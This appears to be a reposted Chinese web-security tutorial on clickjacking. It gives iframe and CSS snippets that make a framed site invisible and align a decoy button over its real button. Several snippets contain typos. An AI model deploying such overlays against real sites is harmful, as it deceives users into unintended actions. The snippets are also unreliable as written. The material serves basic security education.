點擊劫持漏洞

點擊劫持：一個其他的網站，用iframe標簽，<iframe?src=”http://xxx.xxx.xxx”></ifame>

<style> Html,body,iframe{ Display:block; 此處可以設為null Height:100%; Width:100%; Margin:0; margin和padding是元素間距離 Padding:0; Border:nonne; 去掉邊框 } </style>

點擊劫持：通過覆蓋不可見的框架誤導受害者點擊而造成的攻擊行為。

（UI覆蓋攻擊）

利用iframe或其他標簽的屬性。

Iframe{ Opacity:0; 透明度 此處可以去掉因為下面那一行有了 Filter:alpha(opacity=0); IE -moz-opacity:0; 支持CSS3的瀏覽器（FF1.5也支持） Position:absolute Z-index:2;} Button{ 誘惑力圖片中的點擊按鈕 與背后的網站按鈕對應 Position:absoulte; Top:-5px; //圖片與瀏覽器垂直的距離 Left:875px; Z-index:1; //值越大越接近視覺距離 Width:72px; Height:26px; }

總結

以上是生活随笔為你收集整理的WEB安全基础-点击劫持漏洞基础的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。